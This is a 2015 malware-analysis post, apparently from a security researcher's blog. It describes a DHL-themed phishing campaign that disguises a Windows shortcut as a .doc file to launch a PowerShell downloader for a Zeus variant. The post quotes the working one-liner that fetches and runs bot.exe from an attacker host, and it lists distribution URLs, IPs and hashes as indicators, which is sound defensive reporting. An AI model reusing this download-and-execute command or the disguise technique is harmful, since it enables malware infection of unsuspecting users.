2015-11-19

DHL themed Zeus campaign is using Powershell as malware downloader

Hello,
I have spotted DHL themed phishing campaign using Powershell as malware downloader. Here are some samples of the malicious downloader attachment from the phishing email:

https://malwr.com/analysis/YTlhOGRmNTNlYzQzNGIzNTg0ZTZiOTFkNDg1OGI1Nzc/
https://malwr.com/analysis/ZmU0MjliNzNhYmRlNDE1YmE4ZGQ3NWIyNzAxMzQzNzE/

Attachment has extension *.doc.zip file (to pretend to look like zippeddocument) and inside there is *.doc.lnk.
Instead of the MS office document there is windows shortcut (.lnk), but normal users will most probably see only ".doc", because the common setting on windows is to hide extension of known file types. Link file points to powershell binary and has download script as commandline parameter.

Powershell donwloader example:
(New-Object System.Net.WebClient).DownloadFile('hxxp://nov01mail.pw/bot.exe','%temp%\l.exe');(New-Object -com Shell.Application).ShellExecute('%temp%\l.exe');!%SystemRoot%\system32\SHELL32.dll

The phishing email targets on german speaking victims. Sample email here:
http://www.trojaner-board.de/172090-gefaelschte-dhl-email-schaedliche-infektion.html
http://www.netzwelt.de/news/155327-vorsicht-dhl-virus-neue-spam-welle-trojaner-anhang.html
http://phishing-mails.blogspot.co.uk/2015/10/dhl-paket-angekommen.html
http://blog.botfrei.de/2015/10/erneute-dhl-spamwelle-erreicht-unsere-rechner/



These IPs seems to be serving as the download sites for the malware(or were at some point in time):
5.1.75.148
64.110.131.48
107.161.27.133
162.221.176.38
172.98.211.5
172.245.59.194
192.95.11.146
192.227.244.6
198.98.101.159
198.175.126.100
216.45.55.231

Download sites:
hxxp://2610goodvin.pw/bot.exe
hxxp://2710goodvin.pw/bot.exe
hxxp://cash777.pw/bot.exe
hxxp://casher777soft.pw/bot.exe
hxxp://cyberdrive77787.pw/bot.exe
hxxp://goodprice27.pw/bot.exe
hxxp://goodprice28.pw/bot.exe
hxxp://goodvin77787.in/bot.exe
hxxp://jinsuperstarberlin.pw/bot.exe
hxxp://mamba7777.pw/bot.exe
hxxp://masterb.in/bot.exe
hxxp://masterdj.pw/bot.exe
hxxp://masterhost2777.pw/bot.exe
hxxp://masterjin777.pw/bot.exe
hxxp://masterl188.pw/bot.exe
hxxp://masterlin188.pw/bot.exe
hxxp://masterlin288.pw/bot.exe
hxxp://masterlin788.pw/bot.exe
hxxp://megamail777.pw/bot.exe
hxxp://mis2018.pw/bot.exe
hxxp://mrsoft777.pw/bot.exe
hxxp://nov01mail.pw/bot.exe
hxxp://nov15mailmarketing.in/bot.exe
hxxp://nov19mailmarketing.pw/bot.exe
hxxp://supermoney.pw/bot.exe
hxxp://supersoftware777.pw/bot.exe
hxxp://superstar7747.pw/bot.exe
hxxp://superstar7747.pw/cc.exe
hxxp://supportsoft777.pw/bot.exe
hxxp://verygoodwin7.pw/bot.exe

Some Samples - unfortunately the malware detection from AV vendors is quite unconclusive on the malware family, but according to abuse.ch it is some moddified version of Zeus so hopefully these will get tracked by ZeusTracker.abuse.ch at some point:
62c02f0bb1145d3928b1df7493476f88
9abcd77b3d4c487c59c88511dcf8a719
8375e892e2c447ffe3e55cb818f68de0
d62a8b934836b58f25f047620f269bc7
62c02f0bb1145d3928b1df7493476f88
09b9b83f37998713ae972a2fc6e45e2f
7dd81b268585c596ed83a38f696a7d4f
4f9e35c56b87b516b587c64da33f2012
581eb87538fd2b65f2ba19f30e2f64ba
363ff98bc76668092eb5b00e55e1a9d3

I was able to obtain these 3 samples and run it through malwr.com
ccb86eccbde7683410910adf09bc0a62
        from hxxp://masterlin788[.]pw/bot.exe
        https://malwr.com/analysis/ZjhiMmVkZjI3NGU3NGM1MGFlNzVjZDY0M2Y0NzcxMjI/
        https://www.hybrid-analysis.com/sample/f8ab572c3a395812147faed7fef2c688c0c2b3d06c0074ade741ad4d51fd870c/?environmentId=1

d0c2e2a48459ea52cc0e42e15c995ee2
        from hxxp://nov19mailmarketing[.]pw/bot.exe
        https://malwr.com/analysis/YWNjYWY1NDk5MjAxNGNjYWFiMDEwNTRhNzNmODY0NTk/
        https://www.hybrid-analysis.com/sample/6bbb45a9784a0b83f077d6a9d4a7e89d07ddd79a9f8b5d605aad3ab0855d9655?environmentId=1

1a482869a04f9bfe1a557ec391f5df57
        from hxxp://supportsoft777[.]pw/bot.exe
        https://malwr.com/analysis/YWY3NTZlYjg1NzJjNGFmYjliNDU2NmFhNDBmNjFhYjc/